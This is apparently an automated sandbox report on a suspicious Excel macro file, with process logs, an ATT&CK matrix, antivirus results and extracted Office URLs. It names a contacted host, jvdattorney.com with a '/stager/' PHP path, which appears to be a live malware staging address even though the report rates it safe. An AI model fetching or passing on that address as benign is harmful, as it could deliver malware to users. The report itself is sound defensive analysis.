Source: request_form_1611306935.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Replication Through Removable Media1Scripting11Path InterceptionPath InterceptionMasquerading1OS Credential DumpingPeripheral Device Discovery11Replication Through Removable Media1Data from Local SystemExfiltration Over Other Network MediumNon-Application Layer Protocol2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsExploitation for Client Execution23Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothApplication Layer Protocol12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Scripting11Security Account ManagerSystem Information Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
request_form_1611306935.xlsm9%ReversingLabsDocument-Excel.Trojan.Heuristic

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://wus2-000.contentsync.0%URL Reputationsafe
https://wus2-000.contentsync.0%URL Reputationsafe
https://wus2-000.contentsync.0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://ofcrecsvcapi-int.azurewebsites.net/0%Avira URL Cloudsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://officeci.azurewebsites.net/api/0%Avira URL Cloudsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://wus2-000.pagecontentsync.0%URL Reputationsafe
https://wus2-000.pagecontentsync.0%URL Reputationsafe
https://wus2-000.pagecontentsync.0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
http://jvdattorney.com/stager/babmboa.php0%Avira URL Cloudsafe
https://asgsmsproxyapi.azurewebsites.net/0%Avira URL Cloudsafe
https://ncus-000.contentsync.0%URL Reputationsafe
https://ncus-000.contentsync.0%URL Reputationsafe
https://ncus-000.contentsync.0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://ovisualuiapp.azurewebsites.net/pbiagave/0%Avira URL Cloudsafe
https://directory.services.0%URL Reputationsafe
https://directory.services.0%URL Reputationsafe
https://directory.services.0%URL Reputationsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
jvdattorney.com
162.241.225.18
truefalse
    unknown

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    http://jvdattorney.com/stager/babmboa.phpfalse
    • Avira URL Cloud: safe
    unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    https://api.diagnosticssdf.office.com39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drfalse
      high
      https://login.microsoftonline.com/39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drfalse
        high
        https://shell.suite.office.com:144339636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drfalse
          high
          https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drfalse
            high
            https://autodiscover-s.outlook.com/39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drfalse
              high
              https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drfalse
                high
                https://cdn.entity.39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                https://api.addins.omex.office.net/appinfo/query39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drfalse
                  high
                  https://wus2-000.contentsync.39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  unknown
                  https://clients.config.office.net/user/v1.0/tenantassociationkey39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drfalse
                    high
                    https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drfalse
                      high
                      https://powerlift.acompli.net39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://rpsticket.partnerservices.getmicrosoftkey.com39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://lookup.onenote.com/lookup/geolocation/v139636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drfalse
                        high
                        https://cortana.ai39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drfalse
                          high
                          https://cloudfiles.onenote.com/upload.aspx39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drfalse
                            high
                            https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drfalse
                              high
                              https://entitlement.diagnosticssdf.office.com39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drfalse
                                high
                                https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drfalse
                                  high
                                  https://api.aadrm.com/39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  https://ofcrecsvcapi-int.azurewebsites.net/39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drfalse
                                    high
                                    https://api.microsoftstream.com/api/39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drfalse
                                      high
                                      https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drfalse
                                        high
                                        https://cr.office.com39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drfalse
                                          high
                                          https://portal.office.com/account/?ref=ClientMeControl39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drfalse
                                            high
                                            https://ecs.office.com/config/v2/Office39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drfalse
                                              high
                                              https://graph.ppe.windows.net39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drfalse
                                                high
                                                https://res.getmicrosoftkey.com/api/redemptionevents39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                https://powerlift-frontdesk.acompli.net39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                https://tasks.office.com39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drfalse
                                                  high
                                                  https://officeci.azurewebsites.net/api/39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://sr.outlook.office.net/ws/speech/recognize/assistant/work39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drfalse
                                                    high
                                                    https://store.office.cn/addinstemplate39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://wus2-000.pagecontentsync.39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://outlook.office.com/autosuggest/api/v1/init?cvid=39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drfalse
                                                      high
                                                      https://globaldisco.crm.dynamics.com39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drfalse
                                                        high
                                                        https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drfalse
                                                          high
                                                          https://store.officeppe.com/addinstemplate39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://dev0-api.acompli.net/autodetect39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://www.odwebp.svc.ms39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://api.powerbi.com/v1.0/myorg/groups39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drfalse
                                                            high
                                                            https://web.microsoftstream.com/video/39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drfalse
                                                              high
                                                              https://graph.windows.net39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drfalse
                                                                high
                                                                https://dataservice.o365filtering.com/39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://officesetup.getmicrosoftkey.com39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://analysis.windows.net/powerbi/api39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drfalse
                                                                  high
                                                                  https://prod-global-autodetect.acompli.net/autodetect39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://outlook.office365.com/autodiscover/autodiscover.json39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drfalse
                                                                    high
                                                                    https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drfalse
                                                                      high
                                                                      https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drfalse
                                                                        high
                                                                        https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drfalse
                                                                          high
                                                                          https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drfalse
                                                                            high
                                                                            https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drfalse
                                                                              high
                                                                              http://weather.service.msn.com/data.aspx39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drfalse
                                                                                high
                                                                                https://apis.live.net/v5.0/39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drfalse
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drfalse
                                                                                  high
                                                                                  https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drfalse
                                                                                    high
                                                                                    https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drfalse
                                                                                      high
                                                                                      https://management.azure.com39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drfalse
                                                                                        high
                                                                                        https://incidents.diagnostics.office.com39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drfalse
                                                                                          high
                                                                                          https://clients.config.office.net/user/v1.0/ios39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drfalse
                                                                                            high
                                                                                            https://insertmedia.bing.office.net/odc/insertmedia39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drfalse
                                                                                              high
                                                                                              https://o365auditrealtimeingestion.manage.office.com39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drfalse
                                                                                                high
                                                                                                https://outlook.office365.com/api/v1.0/me/Activities39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drfalse
                                                                                                  high
                                                                                                  https://api.office.net39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drfalse
                                                                                                    high
                                                                                                    https://incidents.diagnosticssdf.office.com39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drfalse
                                                                                                      high
                                                                                                      https://asgsmsproxyapi.azurewebsites.net/39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://clients.config.office.net/user/v1.0/android/policies39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drfalse
                                                                                                        high
                                                                                                        https://entitlement.diagnostics.office.com39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drfalse
                                                                                                          high
                                                                                                          https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drfalse
                                                                                                            high
                                                                                                            https://outlook.office.com/39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drfalse
                                                                                                              high
                                                                                                              https://storage.live.com/clientlogs/uploadlocation39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drfalse
                                                                                                                high
                                                                                                                https://templatelogging.office.com/client/log39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drfalse
                                                                                                                  high
                                                                                                                  https://outlook.office365.com/39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drfalse
                                                                                                                    high
                                                                                                                    https://webshell.suite.office.com39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drfalse
                                                                                                                      high
                                                                                                                      https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drfalse
                                                                                                                        high
                                                                                                                        https://management.azure.com/39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drfalse
                                                                                                                          high
                                                                                                                          https://ncus-000.contentsync.39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          https://login.windows.net/common/oauth2/authorize39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drfalse
                                                                                                                            high
                                                                                                                            https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            • URL Reputation: safe
                                                                                                                            • URL Reputation: safe
                                                                                                                            unknown
                                                                                                                            https://graph.windows.net/39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drfalse
                                                                                                                              high
                                                                                                                              https://api.powerbi.com/beta/myorg/imports39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drfalse
                                                                                                                                high
                                                                                                                                https://devnull.onenote.com39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://messaging.office.com/39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://contentstorage.omex.office.net/addinclassifier/officeentities39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drfalse
                                                                                                                                          high
